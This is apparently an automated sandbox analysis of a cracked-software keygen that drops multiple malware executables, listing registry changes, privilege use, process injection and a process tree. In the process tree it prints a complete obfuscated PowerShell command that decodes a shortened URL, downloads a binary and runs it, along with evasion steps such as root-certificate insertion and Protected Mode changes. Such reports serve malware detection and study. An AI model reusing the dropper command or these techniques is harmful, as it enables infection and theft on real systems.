4700 set thread context of 4880 4700 vbndfgame.exe vbndfgame.exe PID 1764 set thread context of 1440 1764 cdvcxsdme.exe cdvcxsdme.exe PID 4424 set thread context of 1676 4424 fodhelper.exe fodhelper.exe PID 4548 set thread context of 4560 4548 fodhelper.exe fodhelper.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4912 2132 WerFault.exe gev.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
explorer.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeDxndvkhrxwosconsoleapp14.exeDxndvkhrxwosconsoleapp14.exevbndfgame.exebb.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Dxndvkhrxwosconsoleapp14.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Dxndvkhrxwosconsoleapp14.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString vbndfgame.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 bb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString bb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 2228 schtasks.exe 1148 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 688 timeout.exe 3716 timeout.exe 1920 timeout.exe 2728 timeout.exe 1548 timeout.exe 4896 timeout.exe 2120 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer explorer.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1540 taskkill.exe 2328 taskkill.exe 3068 taskkill.exe -
Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
Processes:
explorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3" explorer.exe -
Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
Processes:
explorer.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1" explorer.exe -
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main explorer.exe -
Modifies registry class 5 IoCs
Processes:
cmd.exemwh.exegev.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exeUxqcrfgglyzuwogibeigruaconsoleapp12.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings mwh.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings gev.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings Uxqcrfgglyzuwogibeigruaconsoleapp12.exe Key created \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings Uxqcrfgglyzuwogibeigruaconsoleapp12.exe -
Processes:
cc.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 cc.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e cc.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
data.datMicrosoft.VisualStudio.Package.LanguageService.11.0.exeexplorer.exedw20.exepowershell.exepowershell.exepowershell.exepowershell.exemwh.exegev.exepowershell.exepowershell.exepid process 3560 data.dat 3560 data.dat 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2220 explorer.exe 2220 explorer.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2220 explorer.exe 2220 explorer.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe 2376 dw20.exe 2376 dw20.exe 2220 explorer.exe 2220 explorer.exe 428 powershell.exe 428 powershell.exe 3188 powershell.exe 3188 powershell.exe 428 powershell.exe 3188 powershell.exe 4136 powershell.exe 4136 powershell.exe 4368 powershell.exe 4368 powershell.exe 4136 powershell.exe 4368 powershell.exe 4136 powershell.exe 4368 powershell.exe 4884 mwh.exe 4884 mwh.exe 4900 gev.exe 4900 gev.exe 2220 explorer.exe 2220 explorer.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 4696 powershell.exe 3324 powershell.exe 3324 powershell.exe 3324 powershell.exe 2220 explorer.exe 2220 explorer.exe 4900 gev.exe 4900 gev.exe 4884 mwh.exe 4884 mwh.exe 4900 gev.exe 4900 gev.exe 4900 gev.exe 4900 gev.exe -
Suspicious behavior: MapViewOfSection 46 IoCs
Processes:
bb.exeexplorer.exevkr.exevbndfgame.execdvcxsdme.exepid process 1276 bb.exe 1276 bb.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 2220 explorer.exe 5100 vkr.exe 4700 vbndfgame.exe 1764 cdvcxsdme.exe 2220 explorer.exe 2220 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
bb.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.exeexplorer.exewmic.exedescription pid process Token: SeDebugPrivilege 1276 bb.exe Token: SeRestorePrivilege 1276 bb.exe Token: SeBackupPrivilege 1276 bb.exe Token: SeLoadDriverPrivilege 1276 bb.exe Token: SeCreatePagefilePrivilege 1276 bb.exe Token: SeShutdownPrivilege 1276 bb.exe Token: SeTakeOwnershipPrivilege 1276 bb.exe Token: SeChangeNotifyPrivilege 1276 bb.exe Token: SeCreateTokenPrivilege 1276 bb.exe Token: SeMachineAccountPrivilege 1276 bb.exe Token: SeSecurityPrivilege 1276 bb.exe Token: SeAssignPrimaryTokenPrivilege 1276 bb.exe Token: SeCreateGlobalPrivilege 1276 bb.exe Token: 33 1276 bb.exe Token: SeDebugPrivilege 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe Token: SeDebugPrivilege 2220 explorer.exe Token: SeRestorePrivilege 2220 explorer.exe Token: SeBackupPrivilege 2220 explorer.exe Token: SeLoadDriverPrivilege 2220 explorer.exe Token: SeCreatePagefilePrivilege 2220 explorer.exe Token: SeShutdownPrivilege 2220 explorer.exe Token: SeTakeOwnershipPrivilege 2220 explorer.exe Token: SeChangeNotifyPrivilege 2220 explorer.exe Token: SeCreateTokenPrivilege 2220 explorer.exe Token: SeMachineAccountPrivilege 2220 explorer.exe Token: SeSecurityPrivilege 2220 explorer.exe Token: SeAssignPrimaryTokenPrivilege 2220 explorer.exe Token: SeCreateGlobalPrivilege 2220 explorer.exe Token: 33 2220 explorer.exe Token: SeIncreaseQuotaPrivilege 1332 wmic.exe Token: SeSecurityPrivilege 1332 wmic.exe Token: SeTakeOwnershipPrivilege 1332 wmic.exe Token: SeLoadDriverPrivilege 1332 wmic.exe Token: SeSystemProfilePrivilege 1332 wmic.exe Token: SeSystemtimePrivilege 1332 wmic.exe Token: SeProfSingleProcessPrivilege 1332 wmic.exe Token: SeIncBasePriorityPrivilege 1332 wmic.exe Token: SeCreatePagefilePrivilege 1332 wmic.exe Token: SeBackupPrivilege 1332 wmic.exe Token: SeRestorePrivilege 1332 wmic.exe Token: SeShutdownPrivilege 1332 wmic.exe Token: SeDebugPrivilege 1332 wmic.exe Token: SeSystemEnvironmentPrivilege 1332 wmic.exe Token: SeRemoteShutdownPrivilege 1332 wmic.exe Token: SeUndockPrivilege 1332 wmic.exe Token: SeManageVolumePrivilege 1332 wmic.exe Token: 33 1332 wmic.exe Token: 34 1332 wmic.exe Token: 35 1332 wmic.exe Token: 36 1332 wmic.exe Token: SeIncreaseQuotaPrivilege 1332 wmic.exe Token: SeSecurityPrivilege 1332 wmic.exe Token: SeTakeOwnershipPrivilege 1332 wmic.exe Token: SeLoadDriverPrivilege 1332 wmic.exe Token: SeSystemProfilePrivilege 1332 wmic.exe Token: SeSystemtimePrivilege 1332 wmic.exe Token: SeProfSingleProcessPrivilege 1332 wmic.exe Token: SeIncBasePriorityPrivilege 1332 wmic.exe Token: SeCreatePagefilePrivilege 1332 wmic.exe Token: SeBackupPrivilege 1332 wmic.exe Token: SeRestorePrivilege 1332 wmic.exe Token: SeShutdownPrivilege 1332 wmic.exe Token: SeDebugPrivilege 1332 wmic.exe Token: SeSystemEnvironmentPrivilege 1332 wmic.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
data.datKeygen.exevkr.execdvcxsdme.exevbndfgame.exepid process 3560 data.dat 972 Keygen.exe 5100 vkr.exe 1764 cdvcxsdme.exe 4700 vbndfgame.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
amtemu.v0.9.2.win-painter_edited.execmd.exekey.execmd.exebb.exebb.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.exeexplorer.exedescription pid process target process PID 1160 wrote to memory of 4028 1160 amtemu.v0.9.2.win-painter_edited.exe cmd.exe PID 1160 wrote to memory of 4028 1160 amtemu.v0.9.2.win-painter_edited.exe cmd.exe PID 1160 wrote to memory of 4028 1160 amtemu.v0.9.2.win-painter_edited.exe cmd.exe PID 4028 wrote to memory of 920 4028 cmd.exe key.exe PID 4028 wrote to memory of 920 4028 cmd.exe key.exe PID 4028 wrote to memory of 920 4028 cmd.exe key.exe PID 4028 wrote to memory of 2120 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 2120 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 2120 4028 cmd.exe timeout.exe PID 920 wrote to memory of 1408 920 key.exe cmd.exe PID 920 wrote to memory of 1408 920 key.exe cmd.exe PID 920 wrote to memory of 1408 920 key.exe cmd.exe PID 1408 wrote to memory of 2176 1408 cmd.exe attrib.exe PID 1408 wrote to memory of 2176 1408 cmd.exe attrib.exe PID 1408 wrote to memory of 2176 1408 cmd.exe attrib.exe PID 1408 wrote to memory of 3444 1408 cmd.exe find.exe PID 1408 wrote to memory of 3444 1408 cmd.exe find.exe PID 1408 wrote to memory of 3444 1408 cmd.exe find.exe PID 4028 wrote to memory of 2088 4028 cmd.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 4028 wrote to memory of 2088 4028 cmd.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 4028 wrote to memory of 2088 4028 cmd.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 4028 wrote to memory of 688 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 688 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 688 4028 cmd.exe timeout.exe PID 1408 wrote to memory of 3772 1408 cmd.exe find.exe PID 1408 wrote to memory of 3772 1408 cmd.exe find.exe PID 1408 wrote to memory of 3772 1408 cmd.exe find.exe PID 1408 wrote to memory of 3560 1408 cmd.exe data.dat PID 1408 wrote to memory of 3560 1408 cmd.exe data.dat PID 1408 wrote to memory of 3560 1408 cmd.exe data.dat PID 4028 wrote to memory of 3116 4028 cmd.exe bb.exe PID 4028 wrote to memory of 3116 4028 cmd.exe bb.exe PID 4028 wrote to memory of 3116 4028 cmd.exe bb.exe PID 4028 wrote to memory of 3716 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 3716 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 3716 4028 cmd.exe timeout.exe PID 3116 wrote to memory of 1276 3116 bb.exe bb.exe PID 3116 wrote to memory of 1276 3116 bb.exe bb.exe PID 3116 wrote to memory of 1276 3116 bb.exe bb.exe PID 3116 wrote to memory of 1276 3116 bb.exe bb.exe PID 3116 wrote to memory of 1276 3116 bb.exe bb.exe PID 1276 wrote to memory of 2220 1276 bb.exe explorer.exe PID 1276 wrote to memory of 2220 1276 bb.exe explorer.exe PID 1276 wrote to memory of 2220 1276 bb.exe explorer.exe PID 2088 wrote to memory of 1332 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe wmic.exe PID 2088 wrote to memory of 1332 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe wmic.exe PID 2088 wrote to memory of 1332 2088 Microsoft.VisualStudio.Package.LanguageService.11.0.exe wmic.exe PID 4028 wrote to memory of 1808 4028 cmd.exe puttty.exe PID 4028 wrote to memory of 1808 4028 cmd.exe puttty.exe PID 4028 wrote to memory of 1808 4028 cmd.exe puttty.exe PID 4028 wrote to memory of 1920 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 1920 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 1920 4028 cmd.exe timeout.exe PID 4028 wrote to memory of 1308 4028 cmd.exe ereds.exe PID 4028 wrote to memory of 1308 4028 cmd.exe ereds.exe PID 4028 wrote to memory of 1308 4028 cmd.exe ereds.exe PID 2220 wrote to memory of 920 2220 explorer.exe key.exe PID 2220 wrote to memory of 920 2220 explorer.exe key.exe PID 2220 wrote to memory of 1408 2220 explorer.exe cmd.exe PID 2220 wrote to memory of 1408 2220 explorer.exe cmd.exe PID 2220 wrote to memory of 2088 2220 explorer.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 2220 wrote to memory of 2088 2220 explorer.exe Microsoft.VisualStudio.Package.LanguageService.11.0.exe PID 2220 wrote to memory of 3560 2220 explorer.exe data.dat PID 2220 wrote to memory of 3560 2220 explorer.exe data.dat -
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
Processes:
Uxqcrfgglyzuwogibeigruaconsoleapp12.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe -
outlook_win_path 1 IoCs
Processes:
Uxqcrfgglyzuwogibeigruaconsoleapp12.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\872D.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\amtemu.v0.9.2.win-painter_edited.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\key.exekey.exe3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t28024.bat" "C:\Users\Admin\AppData\Local\Temp\872D.tmp\key.exe" "4⤵
- Drops file in Drivers directory
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib +h C:\Users\Admin\AppData\Local\Temp\ytmp5⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\find.exeFIND /C /I "0.0.0.0 cracksmind.com" C:\Windows\system32\drivers\etc\hosts5⤵
-
C:\Windows\SysWOW64\find.exeFIND /C /I "0.0.0.0 www.cracksmind.com" C:\Windows\system32\drivers\etc\hosts5⤵
-
C:\Users\Admin\AppData\Local\Temp\afolder\data.datC:\Users\Admin\AppData\Local\Temp\afolder/data.dat5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 13⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\Microsoft.VisualStudio.Package.LanguageService.11.0.exeMicrosoft.VisualStudio.Package.LanguageService.11.0.exe3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get Caption /format:list4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 23⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exebb.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exe"C:\Users\Admin\AppData\Local\Temp\872D.tmp\bb.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe5⤵
- Modifies firewall policy service
- Checks BIOS information in registry
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 33⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\puttty.exeputtty.exe3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 21764⤵
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 43⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\Temp\872D.tmp\ereds.exeereds.exe3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\keygen.exe"C:\Users\Admin\AppData\Local\Temp\keygen.exe"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1D34.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\keygen.exe"5⤵
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
-
C:\Users\Admin\AppData\Local\Temp\1D34.tmp\Keygen.exeKeygen.exe6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1D34.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}6⤵
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""7⤵
- Blocklisted process makes network request
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Public\vkr.exe"C:\Users\Public\vkr.exe"8⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
